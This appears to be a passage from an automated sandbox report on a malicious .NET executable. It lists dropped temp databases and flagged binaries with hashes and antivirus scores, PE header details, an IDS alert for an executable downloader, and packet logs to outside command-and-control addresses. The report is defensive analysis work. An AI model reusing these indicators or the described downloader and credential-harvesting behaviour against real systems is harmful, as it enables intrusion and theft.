                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.136413900497188
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                        MD5:429F49156428FD53EB06FC82088FD324
                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Ohaadlqgh.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.136413900497188
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                        MD5:429F49156428FD53EB06FC82088FD324
                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Puyghccdm.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):159744
                        Entropy (8bit):0.5394293526345721
                        Encrypted:false
                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                        Malicious:false
                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):811520
                        Entropy (8bit):7.114369265498148
                        Encrypted:false
                        SSDEEP:12288:4/jkbU3p9FZVc+Vt6Ftd6IEZI0FzhM3XufNmOubrmTKBJcFmnp7tHSv0aSUTGLHV:44bk9FZQF36IE/FMj
                        MD5:47DA4EB71A23802DAB374E272EAD2F78
                        SHA1:ED5F82D1073BA6412134549A14F88030ECF6F627
                        SHA-256:79041E3089190C3D8DBCA92540BD2ED3B83A68791FD3876FA4DBAF4B63B7E3C3
                        SHA-512:2DA0C9717CF5D0DDF5A5097F31EFD7B1C0E94C393C160C8DA331F836EBB00915FFE22B44E5E239DAA4DC435A36AA62AD719253AE8F6796B5E47A2CA18E2015D9
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 24%
                        • Antivirus: Virustotal, Detection: 42%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...TV.f.................V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............`..............@..B.................s......H..................J...................................................h.....;}.)........#.r.F.oV{......@.`%...[..C.z..3".....b .[X.u.mr.T{.l.'.@B.....wV...2...Dm.y........m..?I.3.~.>\.,g. .......Pab...<!.........O)...~...+?)..|.....9(...w.P...WC_|?|C..m.t2........._m..-H.....^....>.Zf..V.......g.z.X.G.7..!"C.v....S.*...~D....P.......y ..=-&.;N..;6|.%.JC8.k....... .t"e?..H........F.-..*=z........Xp..K..!.^.M.u._Z..5.....Wm.....<..._.XL.....!NOB..Rn.c{,~^.;.....h.

                        C:\Users\user\AppData\Local\Temp\Srlqip.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):159744
                        Entropy (8bit):0.5394293526345721
                        Encrypted:false
                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                        Malicious:false
                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Tgvkugoauqj.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                        Category:dropped
                        Size (bytes):196608
                        Entropy (8bit):1.121297215059106
                        Encrypted:false
                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                        MD5:D87270D0039ED3A5A72E7082EA71E305
                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                        Malicious:false
                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Tidyi.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):5242880
                        Entropy (8bit):0.03859996294213402
                        Encrypted:false
                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                        Malicious:false
                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Xuwhojto.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):98304
                        Entropy (8bit):0.08235737944063153
                        Encrypted:false
                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Zponsp.tmp

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.8439810553697228
                        Encrypted:false
                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Zqfxk.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                        Category:dropped
                        Size (bytes):196608
                        Entropy (8bit):1.121297215059106
                        Encrypted:false
                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                        MD5:D87270D0039ED3A5A72E7082EA71E305
                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                        Malicious:false
                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\d3d9.dll

                        Download File
                        Process:C:\Users\user\Desktop\x7myVfh5YS.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):511488
                        Entropy (8bit):7.7008462080837425
                        Encrypted:false
                        SSDEEP:12288:f4BX0lFb66iGzQqHIEsJq9Rkw5Bu9Ywn/isxg:gBkHdhUqoEsofkM0YYS
                        MD5:BE6EEC47548380D87F6890501157B8F9
                        SHA1:D112EB4E7064BFD2E74C60092632DD5C519995E0
                        SHA-256:81264C1040C4BF15327D8145CA78C15889B8008DE553D2EA82926DB720F78462
                        SHA-512:5CB019F821AE2625CB7207286D6949BB830C24DB52FFD39936A63E097D78245068134C24DCCF0BB443BD84A08FC531C129EDD77FB9192AB0C5CC06F4EC793872
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 47%
                        • Antivirus: Virustotal, Detection: 61%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QV.f...........!...&.....*......~k.......0............................................@.........................@...T.......<.......................................................................@............0..P............................text............................... ..`.rdata..2h...0...j..................@..@.data...d...........................@....zKW....@....P....... .............. ..`.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.606720780539441
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:x7myVfh5YS.exe
                        File size:1'403'392 bytes
                        MD5:1de4c3cc42232c1e3d7c09404f57b450
                        SHA1:28adaa72fe927ade1b3e073de288e1b6f294d346
                        SHA256:131e2baac32f898ab2d7da10d8c79f546977bc1d1d585ba687387101610ed3b9
                        SHA512:580aae865d815236e1030b173b67dc7002c70cb82caf00953999174833ce22512a4276cae4357b81e0c44e83dbf22eee9713c1138db0887e6f83d72495255671
                        SSDEEP:24576:lEr/LERGBci2VYs1xSiWepMCpmh8Qa4sJ/50iU2:CWUciCtxSiyCph44y2
                        TLSH:575539DC765036DFC86BD4729AA81CA8EB6138BB530B5207906729EDDE4C897DF140F2
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T.f................."...F.......A... ...`....@.. ..............................i.....@................................

                        File Icon

                        Icon Hash:82878c91818181be

                        Static PE Info

                        General

                        Entrypoint:0x55411e
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows cui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66AF54E0 [Sun Aug 4 10:16:00 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1540d00x4b.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1560000x4302.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x1521240x1522003c96edaba53ea7f333d0d50baf1927f7False0.8238988851663586data7.61458092589058IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0x1560000x43020x440041685e5d033a1c3b4e14d2b3124aaa37False0.39148667279411764data5.019576294387208IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x15c0000xc0x200f1490972bad1aa679b24ff83395cf47cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x1561a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.39273858921161825
                        RT_ICON0x1587480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.3972795497185741
                        RT_ICON0x1597f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.4929078014184397
                        RT_GROUP_ICON0x159c580x30data0.8541666666666666
                        RT_VERSION0x159c880x490data0.4049657534246575
                        RT_MANIFEST0x15a1180x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                        2024-08-05T05:54:16.947098+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile49708443192.168.2.562.173.145.78
                        2024-08-05T05:54:15.646834+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile4970680192.168.2.562.173.145.78

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Aug 5, 2024 05:53:54.912636042 CEST49674443192.168.2.523.1.237.91
                        Aug 5, 2024 05:53:54.912640095 CEST49675443192.168.2.523.1.237.91
                        Aug 5, 2024 05:53:55.006407022 CEST49673443192.168.2.523.1.237.91
                        Aug 5, 2024 05:53:57.657769918 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:53:57.662647009 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:53:57.662725925 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:02.689857006 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:02.694781065 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:02.694859982 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:02.699647903 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.123565912 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.123843908 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.123902082 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.123914957 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.123914003 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.123929977 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.123944044 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.124017000 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.124058962 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.242074966 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.242091894 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.242104053 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.242114067 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.242127895 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.242166996 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.242321014 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.242341042 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.242367029 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.242587090 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.242652893 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.242675066 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.287553072 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.359931946 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.359955072 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.359966993 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.359977961 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.359991074 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360054016 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.360173941 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360193968 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360220909 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.360486031 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360503912 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360515118 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360543013 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.360596895 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.360678911 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360691071 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.360732079 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.361330986 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.361342907 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.361399889 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.478157043 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478188038 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478204966 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478249073 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478260994 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478271961 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478415012 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.478513002 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478555918 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478566885 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478615046 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.478627920 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478638887 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478648901 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.478672028 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.478705883 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.480012894 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480072021 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480089903 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480102062 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480113029 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480115891 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.480127096 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.480143070 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.480176926 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.595602989 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595619917 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595634937 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595664024 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595674992 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595686913 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595696926 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595706940 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595707893 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.595720053 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.595782042 CEST497047702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:03.596617937 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.596628904 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.596638918 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.596648932 CEST770249704188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:03.596661091 CEST770249704188.130.138.23192.168.2.5
